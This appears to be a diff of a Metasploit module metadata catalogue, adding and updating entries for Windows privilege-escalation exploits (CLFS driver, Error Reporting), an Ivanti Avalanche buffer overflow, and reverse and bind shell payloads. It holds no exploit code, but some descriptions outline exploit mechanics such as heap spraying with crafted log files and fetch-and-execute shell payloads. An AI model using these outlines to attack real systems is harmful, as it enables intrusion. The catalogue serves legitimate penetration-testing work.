"description": "A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on\n Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.\n\n The clfs.sys driver contains a function CreateLogFile that is used to create\n open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which\n contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a\n .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with\n WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.\n\n This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique\n mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of\n bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe\n that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially\n crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.\n\n The exploits creates a controlled memory space by first looping over the CreatePipe function to\n to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of\n pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the\n 0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.\n\n This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in\n depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).",
"references": [
"CVE-2023-28252",
"URL-https://github.com/fortra/CVE-2023-28252"
],
"platform": "Windows",
"arch": "x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64"
],
"mod_time": "2023-09-11 13:10:57 +0000",
"path": "/modules/exploits/windows/local/cve_2023_28252_clfs_driver.rb",
"is_install_path": true,
"ref_name": "windows/local/cve_2023_28252_clfs_driver",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"unreliable-session"
],
"SideEffects": [
]
},
"session_types": [
"meterpreter"
],
"needs_cleanup": null
},
"exploit_windows/local/dnsadmin_serverlevelplugindll": {
"name": "DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation",
"fullname": "exploit/windows/local/dnsadmin_serverlevelplugindll",
@@ -163101,6 +166016,64 @@
],
"needs_cleanup": true
},
"exploit_windows/local/win_error_cve_2023_36874": {
"name": "Microsoft Error Reporting Local Privilege Elevation Vulnerability",
"fullname": "exploit/windows/local/win_error_cve_2023_36874",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-07-11",
"type": "exploit",
"author": [
"Filip Dragović (Wh04m1001)",
"Octoberfest7",
"bwatters-r7"
],
"description": "This module takes advantage of a bug in the way Windows error reporting opens the report\n parser. If you open a report, Windows uses a relative path to locate the rendering program.\n By creating a specific alternate directory structure, we can coerce Windows into opening an\n arbitrary executable as SYSTEM.\n If the current user is a local admin, the system will attempt impersonation and the exploit will\n fail.",
"references": [
"CVE-2023-36874",
"URL-https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/",
"URL-https://github.com/Wh04m1001/CVE-2023-36874",
"URL-https://github.com/Octoberfest7/CVE-2023-36874_BOF"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2023-09-27 09:43:32 +0000",
"path": "/modules/exploits/windows/local/win_error_cve_2023_36874.rb",
"is_install_path": true,
"ref_name": "windows/local/win_error_cve_2023_36874",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"artifacts-on-disk"
]
},
"session_types": [
"meterpreter",
"shell",
"powershell"
],
"needs_cleanup": true
},
"exploit_windows/local/windscribe_windscribeservice_priv_esc": {
"name": "Windscribe WindscribeService Named Pipe Privilege Escalation",
"fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc",
@@ -167049,6 +170022,58 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/misc/ivanti_avalanche_mdm_bof": {
"name": "Ivanti Avalanche MDM Buffer Overflow",
"fullname": "exploit/windows/misc/ivanti_avalanche_mdm_bof",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-08-14",
"type": "exploit",
"author": [
"Ege BALCI egebalci <Ege BALCI egebalci@pm.me>",
"A researcher at Tenable"
],
"description": "This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.\n An attacker can send a specially crafted message to the Wavelink Avalanche Manager,\n which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.\n This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.\n The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.\n Upon successful exploitation the attacker gains full access to the target system.\n\n This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.",
"references": [
"CVE-2023-32560",
"URL-https://www.tenable.com/security/research/tra-2023-27",
"URL-https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1"
],
"platform": "Windows",
"arch": "x86",
"rport": 1777,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Ivanti Avalanche <= v6.4.0.0"
],
"mod_time": "2023-09-04 16:46:14 +0000",
"path": "/modules/exploits/windows/misc/ivanti_avalanche_mdm_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/ivanti_avalanche_mdm_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_windows/misc/landesk_aolnsrvr": {
"name": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow",
"fullname": "exploit/windows/misc/landesk_aolnsrvr",
@@ -167627,7 +170652,7 @@
"PlugX Type I",
"PlugX Type II"
],
"mod_time": "2021-02-13 04:10:13 +0000",
"mod_time": "2023-07-14 12:46:26 +0000",
"path": "/modules/exploits/windows/misc/plugx.rb",
"is_install_path": true,
"ref_name": "windows/misc/plugx",
@@ -169452,7 +172477,7 @@
"targets": [
"MySQL on Windows prior to Vista"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-08-17 19:07:28 +0000",
"path": "/modules/exploits/windows/mysql/mysql_mof.rb",
"is_install_path": true,
"ref_name": "windows/mysql/mysql_mof",
@@ -169496,7 +172521,7 @@
"targets": [
"MySQL on Windows"
],
"mod_time": "2020-10-02 17:38:06 +0000",
"mod_time": "2023-08-17 19:07:28 +0000",
"path": "/modules/exploits/windows/mysql/mysql_start_up.rb",
"is_install_path": true,
"ref_name": "windows/mysql/mysql_start_up",
@@ -169680,7 +172705,7 @@
"targets": [
"Windows Universal (x64) - v7.80.3132"
],
"mod_time": "2023-02-08 15:46:07 +0000",
"mod_time": "2023-07-14 12:46:26 +0000",
"path": "/modules/exploits/windows/nimsoft/nimcontroller_bof.rb",
"is_install_path": true,
"ref_name": "windows/nimsoft/nimcontroller_bof",
@@ -170819,7 +173844,7 @@
"Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)",
"Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)"
],
"mod_time": "2020-09-18 11:38:43 +0000",
"mod_time": "2023-07-14 12:46:26 +0000",
"path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
"is_install_path": true,
"ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -170868,7 +173893,7 @@
"Execute payload (x64)",
"Neutralize implant"
],
"mod_time": "2020-01-29 13:16:02 +0000",
"mod_time": "2023-09-15 16:42:03 +0000",
"path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb",
"is_install_path": true,
"ref_name": "windows/rdp/rdp_doublepulsar_rce",
@@ -170887,6 +173912,9 @@
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
@@ -173861,7 +176889,7 @@
"Windows 10 Pro",
"Windows 10 Enterprise Evaluation"
],
"mod_time": "2022-08-08 01:40:15 +0000",
"mod_time": "2023-07-14 12:46:26 +0000",
"path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms17_010_eternalblue",
@@ -174124,7 +177152,7 @@
"Execute payload (x64)",
"Neutralize implant"
],
"mod_time": "2020-05-07 20:22:56 +0000",
"mod_time": "2023-09-15 16:40:22 +0000",
"path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb",
"is_install_path": true,
"ref_name": "windows/smb/smb_doublepulsar_rce",
@@ -174144,6 +177172,9 @@
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
]
},
"session_types": false,
@@ -177081,7 +180112,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -177119,7 +180150,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -177157,7 +180188,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -177329,7 +180360,7 @@
],
"description": "Listen for a connection and spawn a command shell over IPv6",
"references": [
"URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c"
],
"platform": "BSD",
"arch": "x64",
@@ -177337,7 +180368,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-01-05 14:59:46 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_bind_ipv6_tcp",
@@ -177402,7 +180433,7 @@
],
"description": "Listen for a connection and spawn a command shell",
"references": [
"URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c"
],
"platform": "BSD",
"arch": "x64",
@@ -177410,7 +180441,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-01-05 14:59:46 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_bind_tcp_small",
@@ -177438,7 +180469,7 @@
],
"description": "Connect back to attacker and spawn a command shell over IPv6",
"references": [
"URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c"
],
"platform": "BSD",
"arch": "x64",
@@ -177446,7 +180477,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-01-05 14:59:46 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_reverse_ipv6_tcp",
@@ -177511,7 +180542,7 @@
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
"URL-https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c"
],
"platform": "BSD",
"arch": "x64",
@@ -177519,7 +180550,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-01-05 14:59:46 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_reverse_tcp_small",
@@ -178956,7 +181987,7 @@
],
"description": "Fetch and execute an x64 payload from an HTTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.",
"references": [
"URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
],
"platform": "Linux",
"arch": "cmd",
@@ -181415,7 +184446,7 @@
],
"description": "Fetch and execute an x64 payload from an HTTPS server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.",
"references": [
"URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
],
"platform": "Linux",
"arch": "cmd",
@@ -183874,7 +186905,7 @@
],
"description": "Fetch and execute an x64 payload from a TFTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.",
"references": [
"URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
],
"platform": "Linux",
"arch": "cmd",
@@ -185839,6 +188870,42 @@
"payload_type": 1,
"staged": false
},
"payload_cmd/unix/bind_aws_instance_connect": {
"name": "Unix SSH Shell, Bind Instance Connect (via AWS API)",
"fullname": "payload/cmd/unix/bind_aws_instance_connect",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"RageLtMan <rageltman@sempervictus>"
],
"description": "Creates an SSH shell using AWS Instance Connect",
"references": [
"URL-https://www.sempervictus.com/single-post/a-serial-case-of-air-on-the-side-channel"
],
"platform": "Unix",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-08-01 15:02:11 +0000",
"path": "/modules/payloads/singles/cmd/unix/bind_aws_instance_connect.rb",
"is_install_path": true,
"ref_name": "cmd/unix/bind_aws_instance_connect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false,
"payload_type": 1,
"staged": false
},
"payload_cmd/unix/bind_busybox_telnetd": {
"name": "Unix Command Shell, Bind TCP (via BusyBox telnetd)",
"fullname": "payload/cmd/unix/bind_busybox_telnetd",
@@ -188112,6 +191179,42 @@
"payload_type": 1,
"staged": false
},
"payload_cmd/unix/reverse_socat_tcp": {
"name": "Unix Command Shell, Reverse TCP (via socat)",
"fullname": "payload/cmd/unix/reverse_socat_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jheysel-r7"
],
"description": "Creates an interactive shell via socat",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-09-06 15:52:56 +0000",
"path": "/modules/payloads/singles/cmd/unix/reverse_socat_tcp.rb",
"is_install_path": true,
"ref_name": "cmd/unix/reverse_socat_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false,
"payload_type": 1,
"staged": false
},
"payload_cmd/unix/reverse_socat_udp": {
"name": "Unix Command Shell, Reverse UDP (via socat)",
"fullname": "payload/cmd/unix/reverse_socat_udp",
@@ -188649,7 +191752,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp",
@@ -188692,7 +191795,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/bind_ipv6_tcp_uuid",
@@ -188734,7 +191837,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/bind_named_pipe",
@@ -188776,7 +191879,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/bind_tcp",
@@ -188823,7 +191926,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/bind_tcp_rc4",
@@ -188866,7 +191969,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/bind_tcp_uuid",
@@ -188908,7 +192011,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/reverse_http",
@@ -188952,7 +192055,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/reverse_https",
@@ -188994,7 +192097,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/reverse_named_pipe",
@@ -189036,7 +192139,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/reverse_tcp",
@@ -189083,7 +192186,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/reverse_tcp_rc4",
@@ -189126,7 +192229,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/reverse_tcp_uuid",
@@ -189168,7 +192271,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/reverse_winhttp",
@@ -189210,7 +192313,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/custom/reverse_winhttps",
@@ -189252,7 +192355,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/encrypted_shell/reverse_tcp",
@@ -189294,7 +192397,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/encrypted_shell_reverse_tcp",
@@ -189333,7 +192436,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/exec",
@@ -189373,7 +192476,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/loadlibrary",
@@ -189412,7 +192515,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/messagebox",
@@ -189454,7 +192557,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp",
@@ -189498,7 +192601,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid",
@@ -189543,7 +192646,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/bind_named_pipe",
@@ -189587,7 +192690,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp",
@@ -189635,7 +192738,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_rc4",
@@ -189679,7 +192782,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/bind_tcp_uuid",
@@ -189723,7 +192826,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_http",
@@ -189770,7 +192873,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_https",
@@ -189814,7 +192917,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_named_pipe",
@@ -189858,7 +192961,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp",
@@ -189906,7 +193009,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_rc4",
@@ -189950,7 +193053,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_tcp_uuid",
@@ -189994,7 +193097,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttp",
@@ -190038,7 +193141,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter/reverse_winhttps",
@@ -190082,7 +193185,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter_bind_named_pipe",
@@ -190123,7 +193226,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter_bind_tcp",
@@ -190164,7 +193267,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_http",
@@ -190205,7 +193308,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_https",
@@ -190246,7 +193349,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_ipv6_tcp",
@@ -190287,7 +193390,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/meterpreter_reverse_tcp",
@@ -190319,7 +193422,7 @@
],
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -190327,7 +193430,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-03-15 19:19:19 +0000",
"mod_time": "2023-07-31 16:38:09 +0000",
"path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
"is_install_path": true,
"ref_name": "cmd/windows/http/x64/peinject/bind_ipv6_tcp",
@@ -190362,7 +193465,7 @@
],
"description": "Fetch and Execute an x64 payload from an http server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
